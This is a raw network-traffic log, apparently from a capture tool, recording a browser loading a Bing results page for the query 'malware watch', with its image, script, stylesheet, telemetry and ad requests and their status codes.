GET https://th.bing.com/th?id=OIP.Pm3e4l4KpaZGRWVEzIEH2wAAAA&w=80&h=80&c=1&vt=10&bgcl=08029d&r=0&o=6&pid=5.1HTTP Request
GET https://th.bing.com/th?id=ODLS.c7e742a7-e059-442e-80ab-53e3057edff4&w=32&h=32&qlt=95&pcl=fffffa&o=6&pid=1.2HTTP Response
200HTTP Request
GET https://th.bing.com/th?id=OIP.Pm3e4l4KpaZGRWVEzIEH2wAAAA&w=80&h=80&c=1&vt=10&bgcl=cb8747&r=0&o=6&pid=5.1HTTP Request
GET https://th.bing.com/th?id=ODLS.c7e742a7-e059-442e-80ab-53e3057edff4&w=16&h=16&c=7&o=6&pid=1.7HTTP Response
200HTTP Response
200HTTP Request
GET https://www.bing.com/fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&TYPE=Event.ClientInst&DATA=%5B%7B%22Namespace%22%3A%22SearchHarder%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274627345%2C%22Name%22%3A%22ButtonVisible%22%2C%22FID%22%3A%22SearchHarderEntryPoint%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.EffectiveLocation%22%2C%22TS%22%3A1738274627377%2C%22Name%22%3A%22WriteEffectiveLocationSuccess%22%2C%22FID%22%3A%22EffectiveLocation%22%7D%5DHTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://th.bing.com/th?id=ODLS.41714610-7805-4084-b931-dc0a6d82432e&w=16&h=16&c=7&o=6&pid=1.7HTTP Request
GET https://th.bing.com/th?id=ODLS.3bc1a8a9-5d72-433e-aea7-1fd5fa3fea80&w=16&h=16&c=7&o=6&pid=1.7HTTP Request
GET https://th.bing.com/th?id=ODLS.41714610-7805-4084-b931-dc0a6d82432e&w=32&h=32&qlt=96&pcl=fffffa&o=6&pid=1.2HTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://www.bing.com/fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22CharCount%22,%22Text%22:%2213%22}]HTTP Request
GET https://www.bing.com/fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22LandingRows%22,%22Text%22:%221%22}]HTTP Request
GET https://www.bing.com/images/sbi?mmasync=1&ig=69579D85EA2D4E95B5358DAB8D3A2EA2&iid=.5100&ptn=Web&ep=0&iconpl=1HTTP Request
GET https://www.bing.com/fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&TYPE=Event.ClientInst&DATA=%5B%7B%22Time%22%3A1253%2C%22time%22%3A1255%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Latency%22%2C%22TS%22%3A1738274627650%2C%22Name%22%3A%22Loaded%22%2C%22FID%22%3A%22HP%22%7D%5DHTTP Request
GET https://www.bing.com/fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&TYPE=Event.ClientInst&DATA=%5B%7B%22comp%22%3A%22loaded%22%2C%22time%22%3A1255%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1738274627650%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5DHTTP Request
GET https://www.bing.com/fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&TYPE=Event.ClientInst&DATA=%5B%7B%22micComponent%22%3A%22rendered%22%2C%22time%22%3A1255%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1738274627650%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5DHTTP Response
200HTTP Response
200HTTP Request
POST https://www.bing.com/rewardsapp/ncheader?ver=53219865&IID=SERP.5055&IG=69579D85EA2D4E95B5358DAB8D3A2EA2HTTP Request
POST https://www.bing.com/rewardsapp/reportActivity?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&IID=SERP.5065&q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://r.bing.com/rp/fdVZU4ttbw8NDRm6H3I5BW3_vCo.svgHTTP Request
GET https://r.bing.com/rp/4L4QdyjTv0HYE2Ig2ol9eYoqxg8.svgHTTP Request
GET https://r.bing.com/rp/Fsa_OI0AplCnVoXGca8ALOo0S0s.svgHTTP Request
GET https://r.bing.com/rp/UYtUYDcn1oZlFG-YfBPz59zejYI.svgHTTP Request
GET https://r.bing.com/rp/kiGH9ukZK6Q4hvtDtwwVc1yvueg.svgHTTP Request
GET https://r.bing.com/rp/KC_nX2_tPPyFvVw1RK20Yu1FyDk.svgHTTP Request
GET https://r.bing.com/rp/NnFHhz2jL6yzChtIhaB5IIVKY5k.svgHTTP Request
GET https://r.bing.com/rp/hx-eea1zqtCz4K0bW2uH_oN7Fs4.jpgHTTP Request
GET https://r.bing.com/rp/95z5wMy4UcfbSSSlSw780vQ5jKA.jpgHTTP Request
GET https://r.bing.com/rp/GJDmKr3_TS3Qpm6KEL9UKUQKUO4.jpgHTTP Request
GET https://r.bing.com/rp/ln5TQq6AIWfcBlduDk-5bnaJMpY.jpgHTTP Request
GET https://r.bing.com/rp/dbmNS45xQvD1diApY1T2HExvOo8.jpgHTTP Request
GET https://r.bing.com/rp/cfeVf2-uV0hUo3ToTbLjztuomWk.jpgHTTP Request
GET https://r.bing.com/rp/lvCKZ07bEYtoYmY62ifMzVa0RIE.jpgHTTP Request
GET https://r.bing.com/rp/ni3MyKKVu9pK0SgY6gb6Z2NOGpg.jpgHTTP Response
200HTTP Request
GET https://r.bing.com/rp/c4ruj6QGsmSnOG64gJJnnnYDa44.br.cssHTTP Request
GET https://r.bing.com/rp/5-y8FBmAkXLBZZghI-X94CRnsqg.br.cssHTTP Request
GET https://r.bing.com/rp/17Kbwo14aoBIPkSeISAgHKajyeA.br.cssHTTP Request
GET https://r.bing.com/rp/vDjLjnEkXEuH2C8u3tT0A004qwQ.br.cssHTTP Response
200HTTP Response
200HTTP Request
POST https://www.bing.com/fd/ls/GLinkPingPost.aspx?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&ID=SERP,5204.2&url=https%3A%2F%2Fwww.bing.com%2Fck%2Fa%3F!%26%26p%3D07539e014cb75e508897e36ea39bb08b84ed3b4c61ded522a00aab4da4cb1502JmltdHM9MTczODE5NTIwMA%26ptn%3D3%26ver%3D2%26hsh%3D4%26fclid%3D2b1bfc6b-1dfe-6302-0fdc-e9ef1c62624d%26psq%3Dmalware%2Bwatch%26u%3Da1aHR0cHM6Ly93d3cubWFsd2FyZXdhdGNoLm9yZy8%26ntb%3D1HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://www.bing.com/ck/a?!&&p=07539e014cb75e508897e36ea39bb08b84ed3b4c61ded522a00aab4da4cb1502JmltdHM9MTczODE5NTIwMA&ptn=3&ver=2&hsh=4&fclid=2b1bfc6b-1dfe-6302-0fdc-e9ef1c62624d&psq=malware+watch&u=a1aHR0cHM6Ly93d3cubWFsd2FyZXdhdGNoLm9yZy8&ntb=1HTTP Response
200HTTP Request
GET https://www.bing.com/fd/ls/l?BF=MSJ1&IG=69579D85EA2D4E95B5358DAB8D3A2EA2&TYPE=Event.ClientInst&DATA=[{%22T%22:%22CI.BF%22,%22X%22:1}]HTTP Request
GET https://www.bing.com/fd/ls/l?BF=MSJ0&IG=69579D85EA2D4E95B5358DAB8D3A2EA2&TYPE=Event.ClientInst&DATA=[{%22T%22:%22CI.BF%22,%22X%22:0}]HTTP Response
200HTTP Request
POST https://www.bing.com/orgid/idtoken/conditionalHTTP Response
200HTTP Request
GET https://www.bing.com/fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22fdbkans_0%22}]HTTP Request
GET https://www.bing.com/fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22sb_feedback%22}]HTTP Request
GET https://www.bing.com/geolocation/write?isBlocked=true&sid=05DFC6CDCE37668C2381D349CFAB67A5&clientsid=05DFC6CDCE37668C2381D349CFAB67A5HTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://www.bing.com/fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1738274627668%2C%22Name%22%3A%22OrgId%22%2C%22FID%22%3A%22NoSignInAttempt%22%7D%2C%7B%22correlationId%22%3A%22679bf743624149b99a0843177321b5f6%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1738274627685%2C%22Name%22%3A%22loadJsModule%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22correlationId%22%3A%22679bf743624149b99a0843177321b5f6%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1738274627685%2C%22Name%22%3A%22undirectflow%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1738274627704%2C%22Name%22%3A%22Show%22%2C%22FID%22%3A%22%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1738274627704%2C%22Name%22%3A%22ShowBubble%22%2C%22FID%22%3A%22%22%7D%2C%7B%22osBuildVersion%22%3A%5B%2210%22%2C%220%22%2C%2219041%22%5D%2C%22isWin11OrHigher%22%3A%22false%22%2C%22fullOsBuild%22%3A%2210.0.19041%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274627719%2C%22Name%22%3A%22OSBuild%22%2C%22FID%22%3A%22OSBuild%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Tab%22%2C%22TS%22%3A1738274628201%2C%22Name%22%3A%221%22%2C%22FID%22%3A%22count%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1738274628223%2C%22Name%22%3A%22PromptDevLoc%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5DHTTP Request
GET https://www.bing.com/fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1738274628223%2C%22Name%22%3A%22Perm_Available%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5DHTTP Response
200HTTP Request
GET https://www.bing.com/fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.CookieGetBlocked%22%2C%22TS%22%3A1738274628224%2C%22Name%22%3A%22%22%2C%22FID%22%3A%22dsc%22%7D%2C%7B%22Text%22%3A%220%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274628238%2C%22Name%22%3A%22web%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%221%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274628238%2C%22Name%22%3A%22conv%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%222%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274628238%2C%22Name%22%3A%22shop%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%223%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274628238%2C%22Name%22%3A%22images%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%224%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274628238%2C%22Name%22%3A%22video%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%225%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274628238%2C%22Name%22%3A%22local%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%226%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274628238%2C%22Name%22%3A%22news%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%227%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274628238%2C%22Name%22%3A%22flights%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%228%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274628238%2C%22Name%22%3A%22travelhub%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%229%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274628238%2C%22Name%22%3A%22hotels%22%2C%22FID%22%3A%22DynScopeRank%22%7D%5DHTTP Response
200HTTP Request
GET https://www.bing.com/fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&TYPE=Event.ClientInst&DATA=%5B%7B%22Fallback%22%3A%221%22%2C%22IsRewardUser%22%3A%22%22%2C%22IsAutoOpenFlyout%22%3A%22%22%2C%22SuppressionReason%22%3A%22NoTrigger%3AMuidTrialConfigDisabled%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AutoOpenFlyoutFired%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1738274628239%2C%22Name%22%3A%22AutoOpenFlyoutFired%22%7D%5DHTTP Response
200HTTP Request
GET https://www.bing.com/fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1738274628240%2C%22Name%22%3A%22Perm_Denied%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5DHTTP Response
200HTTP Request
GET https://www.bing.com/fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1738274628240%2C%22Name%22%3A%22block%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5DHTTP Response
200HTTP Request
GET https://www.bing.com/fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1738274628240%2C%22Name%22%3A%22tryBlock%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5DHTTP Response
200HTTP Response
200HTTP Request
GET https://www.bing.com/fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&Type=Event.PPT&DATA={%22S%22:529,%22E%22:1661,%22T%22:0,%22I%22:0,%22N%22:{},%22M%22:{}}&P=SERP&DA=DUBE01HTTP Request
GET https://www.bing.com/fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.ASBundleLoad%22%2C%22TS%22%3A1738274628324%2C%22Name%22%3A%22AutoSuggestBootstrap%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%22713.5%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.AutosuggestBootstrapLoaded%22%2C%22TS%22%3A1738274628326%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%221928.5%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.AutosuggestJSBundleLoaded%22%2C%22TS%22%3A1738274628326%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1738274628330%2C%22Name%22%3A%22BlockSuccess%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5DHTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
POST https://www.bing.com/fd/ls/lsp.aspxHTTP Response
204HTTP Request
GET https://www.bing.com/secure/Passport.aspx?popup=1&ssl=1HTTP Response
200HTTP Request
GET https://www.bing.com/ipv6test/test?FORM=MONITRHTTP Response
200HTTP Request
POST https://www.bing.com/fd/ls/lsp.aspxHTTP Response
204HTTP Request
POST https://www.bing.com/fd/ls/ls.gif?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&Type=Event.ClientInst&DATA={%22T%22:%22CI.Unload%22,%22Name%22:%22D%22,%22AppNS%22:%22SERP%22,%22TS%22:1738274662554}&log=UserEventHTTP Request
POST https://www.bing.com/fd/ls/lsp.aspxHTTP Response
200HTTP Response
204 -
150.171.28.10:443https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=ea6016aa204c40d28ef837e0e53e8452&localId=w:0E6DBFDF-A422-D12B-C993-83A8853F7845&deviceId=6966578605783440&anid=tls, http22.0kB 9.4kB 21 19
HTTP Request
GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=ea6016aa204c40d28ef837e0e53e8452&localId=w:0E6DBFDF-A422-D12B-C993-83A8853F7845&deviceId=6966578605783440&anid=HTTP Response
204HTTP Request
GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=ea6016aa204c40d28ef837e0e53e8452&localId=w:0E6DBFDF-A422-D12B-C993-83A8853F7845&deviceId=6966578605783440&anid=HTTP Response
204HTTP Request
GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=ea6016aa204c40d28ef837e0e53e8452&localId=w:0E6DBFDF-A422-D12B-C993-83A8853F7845&deviceId=6966578605783440&anid=HTTP Response
204 -
1.0kB 5.1kB 9 11
-
1.0kB 5.1kB 9 11
-
21.7kB 446.7kB 269 381
HTTP Request
GET https://r.bing.com/rp/pnQekwGX3mbGjW4IGiGST6jTzVM.br.cssHTTP Response
200HTTP Request
GET https://r.bing.com/rp/eeSRHmOwBCiYGkxCHmb9VbJ2hT8.br.jsHTTP Request
GET https://r.bing.com/rp/cmkA5GOzehgW38VorLIwEgHFV24.br.jsHTTP Request
GET https://r.bing.com/rp/CBYihxJekbyAlLiT2TGCv3XcxBA.br.jsHTTP Request
GET https://r.bing.com/rp/KLrSbzDKMog0mCiPcB9iwoEvlE4.br.jsHTTP Request
GET https://r.bing.com/rp/TaNyfCzxqBX9l7QZbgZUegopTuI.br.jsHTTP Request
GET https://r.bing.com/rp/cfKt7bw67nxWZkkgOIRReDE3rQI.br.jsHTTP Request
GET https://r.bing.com/rp/co2z1JDFb7enoIoCaLuo-NbJJjE.br.jsHTTP Request
GET https://r.bing.com/rp/K3hC1_cQXGFr6cxRJVWYpzZJaAM.br.jsHTTP Request
GET https://r.bing.com/rp/n23ANye7L3wtUcgKxoGHb7_ezc4.br.jsHTTP Request
GET https://r.bing.com/rp/DmYomXZ0p9--syG1mm6CnQwvRHg.br.jsHTTP Request
GET https://r.bing.com/rp/2VYJBWEs9lbV3Q50EXL7TNnGBog.br.jsHTTP Request
GET https://r.bing.com/rp/lLk8XmbdNzzlnPRzVzDhaF9yjqw.br.jsHTTP Request
GET https://r.bing.com/rp/Gyuq2bqitqDJM0BeAkbKXGlQXNw.br.jsHTTP Request
GET https://r.bing.com/rp/n21aGRCN5EKHB3qObygw029dyNU.br.jsHTTP Request
GET https://r.bing.com/rp/8CgcSSLayxEVUBf0swP_bQGMId8.br.jsHTTP Request
GET https://r.bing.com/rp/V_fBQ_iVmAgE_Ta_T-6BNXc0ZY4.br.jsHTTP Request
GET https://r.bing.com/rp/9xGNA8UskvA9WHF58zbLOHZ5HvI.br.jsHTTP Request
GET https://r.bing.com/rp/_2I169N92jVtSc_VEsV0nma5sRY.br.jsHTTP Request
GET https://r.bing.com/rp/gKwIRAF4fg7noG1zyeUz8x3Jdhc.br.jsHTTP Request
GET https://r.bing.com/rp/zL4sntecq0RmP6dobtS9Rd5WRvU.br.jsHTTP Request
GET https://r.bing.com/rp/psgXZvzYJMEW2ydikIk493Va1d4.br.jsHTTP Request
GET https://r.bing.com/rs/6r/x5/nj/nt6a1ZR520utsLoZmSYgwxdOPgI.js?or=wHTTP Request
GET https://r.bing.com/rp/5L3iD467J3iJWEPwIjxlK0MMDpY.br.jsHTTP Request
GET https://r.bing.com/rp/9Z2GyyGvsKSVNrmOMrTfcv8z_yQ.br.jsHTTP Request
GET https://r.bing.com/rp/K_V1CARn2Q2lTs5njJKUvUkHyi4.br.jsHTTP Request
GET https://r.bing.com/rp/dUzSc2TJEdHviToK914Fg1aekPA.br.jsHTTP Request
GET https://r.bing.com/rp/8LIV7VPMYjV_ya4Ggnu8LBWQIQQ.br.jsHTTP Request
GET https://r.bing.com/rp/JTnIefOMiNK7DX11D7RY8i0_PKc.br.jsHTTP Request
GET https://r.bing.com/rp/_Bf8WbhrPNleVJdfG-L0A8nld9c.br.jsHTTP Request
GET https://r.bing.com/rp/NfTD8Ovh04Y_Ni14YxqYB8R_2_Q.br.jsHTTP Request
GET https://r.bing.com/rs/6r/ku/jnc,nj/cNbseG2vlUH2ubvgjbDJtgTzQPo.js?or=wHTTP Request
GET https://r.bing.com/rp/fRSNKQanUHk53F1a1Bi8UA71Qt4.br.jsHTTP Request
GET https://r.bing.com/rp/mOy7YpeLJ3c40BBAFNUI6SmOUTY.br.jsHTTP Request
GET https://r.bing.com/rp/6mZmj1db42G_jniFgdT7MCvBgyA.br.jsHTTP Request
GET https://r.bing.com/rp/iY8PAEydb3lbGfuJiuA9ICzXgY8.br.jsHTTP Request
GET https://r.bing.com/rp/UftfQbYuKvGGEUHPU3QGHYd90Z8.br.jsHTTP Request
GET https://r.bing.com/rp/TA5w4JZB_Bofmi4E2NA9kDEyusQ.br.jsHTTP Request
GET https://r.bing.com/rp/zlfm-hC70pZAs62UVTTl3KShKOE.br.jsHTTP Request
GET https://r.bing.com/rp/DWZSY9SRnkHaYWjJ109REMim90A.br.jsHTTP Request
GET https://r.bing.com/rp/9uYIRoQB-ThMq970XKGeKvrMhL0.br.jsHTTP Request
GET https://r.bing.com/rp/bdiAPlmUnJhdap3y8myDMEGlF4w.br.jsHTTP Request
GET https://r.bing.com/rp/WwTHOlBv_iLBpZXNWkp-HzVHgrM.br.jsHTTP Request
GET https://r.bing.com/rp/CcMXS8Oo0OUnUE0LzYK9AFJ6la8.br.jsHTTP Request
GET https://r.bing.com/rp/R5OIlHZUEYWuNhJa46yx5Wir2pM.br.jsHTTP Request
GET https://r.bing.com/rp/-gqBS9VzaGQOAafzweDVcqAD18I.br.jsHTTP Request
GET https://r.bing.com/rp/1Jz2vFBGshGz47SHAQMwptTnpB0.br.jsHTTP Request
GET https://r.bing.com/rp/Cah4LahmcqZwMC9LQrNkz-q8yNA.br.jsHTTP Request
GET https://r.bing.com/rp/7q76z2PhZYQSlMklnpUZ4ZrWoeg.br.jsHTTP Request
GET https://r.bing.com/rp/MnlneN-7se6Sb8r2rU60mRHbccg.br.jsHTTP Request
GET https://r.bing.com/rp/HqDsKR6xyRoUSYXXRfEdLVt772I.br.jsHTTP Request
GET https://r.bing.com/rp/u2MYL4Uj-EK9FdZPToQOipi2q40.br.jsHTTP Request
GET https://r.bing.com/rp/IzifzVeZAFUPAOVXA0p1w_tvqEA.br.jsHTTP Request
GET https://r.bing.com/rp/B-tRIg18CBKTY5_L9A8pOhYyyQo.br.jsHTTP Request
GET https://r.bing.com/rp/mRnHl5xOMNMCkNGN3wISIz0ETug.br.jsHTTP Request
GET https://r.bing.com/rp/X9zPQVZQzKFTYze2B2WNn1LJCS4.br.jsHTTP Request
GET https://r.bing.com/rp/1u_LY-3P7BIagPGDkiUCRzkKi-0.br.jsHTTP Request
GET https://r.bing.com/rp/UJFGe_i3c1Lxhghza2lclR7CxpI.br.jsHTTP Request
GET https://r.bing.com/rp/3s0czFTJyV5b3KCC7geWICWvvPs.br.jsHTTP Request
GET https://r.bing.com/rp/wNhUjm3kl_kvyfrio44J6j1zdYo.br.jsHTTP Request
GET https://r.bing.com/rp/lwQThTlaI10v50gbypuOTf2JDcM.br.jsHTTP Request
GET https://r.bing.com/rp/wJ4ypLxMemRfvxvJkUCpuYEBwew.br.jsHTTP Request
GET https://r.bing.com/rp/RvRBoZ5KQDNHwbHfo-_ZBZIoYQo.br.jsHTTP Request
GET https://r.bing.com/rp/bzAVZoOHiaJeSbLoUcTPF4HPvJQ.br.jsHTTP Request
GET https://r.bing.com/rp/gfI083AUtzdZuPReAN6CvS-Ca98.br.jsHTTP Request
GET https://r.bing.com/rp/k_DNa1TDg1SFhPx_XEzMve_fpFM.br.jsHTTP Request
GET https://r.bing.com/rp/ztUh7qME7I8WPjdMsB8y8tLZ8s4.br.jsHTTP Request
GET https://r.bing.com/rp/4a2l6ts7ENpX5gGW0kp5U2iD6h8.br.jsHTTP Request
GET https://r.bing.com/rp/eKvcHdnNwo1WcxoSioV4ztnfZk8.br.jsHTTP Request
GET https://r.bing.com/rp/Sv8bO2oxkbGjZh6Pe_GKzG1DtDU.br.jsHTTP Request
GET https://r.bing.com/rp/-2EVJNDwymhr08bVch00GwpjiDA.br.jsHTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://r.bing.com/rp/lwgCOY8rCo0Ub0btSshwRlT9HWI.br.jsHTTP Request
GET https://r.bing.com/rp/ulJ3ckR0YcGpvIX6xhO4prJhEQQ.br.jsHTTP Request
GET https://r.bing.com/rp/ivu0QwP26BHIJjH_DSqboRdhsO0.br.jsHTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://r.bing.com/rp/81LX7TP_DYNhvhaKa1MAKI2R73g.br.jsHTTP Request
GET https://r.bing.com/rp/l67XMHcHSezhrHeT6MUZN_k_RJw.br.jsHTTP Response
200HTTP Response
200HTTP Request
